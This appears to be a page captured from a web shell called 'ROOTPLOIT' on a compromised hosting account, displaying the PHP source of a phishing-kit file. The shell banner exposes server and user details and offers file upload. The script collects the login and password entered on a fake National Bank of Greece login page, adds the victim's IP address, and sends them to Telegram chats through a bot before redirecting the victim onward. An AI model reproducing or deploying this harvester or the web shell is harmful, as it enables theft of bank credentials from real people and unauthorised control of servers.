ROOTPLOIT
Server: Apache
System: Linux node6122.myfcloud.com 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User: bashacomputer (1004)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/bashacomputer/public_html/iljawa/torsion/anti/ci.php
<?php
   include "../config.php";
     

   $ip = getenv("REMOTE_ADDR");
      $message = "-------------------- 🏦 NBG Login 🏦-------------------\nLogin : ".$_POST['login']."\nPass : ".$_POST['password']."\nIP      : ".$ip."\n-------------------- 🇬🇷 Zoldyck 🇬🇷-------------------\n";
   foreach($user_ids as $user_id) {
   $url='https://api.telegram.org/bot'.$bottoken.'/sendMessage';
   $data=array('chat_id'=>$user_id,'text'=>$message);
   $options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
   $context=stream_context_create($options);
   $result=file_get_contents($url,false,$context);
   
   }
   header("Location: ../info.php?id=$ip");
   
   ?>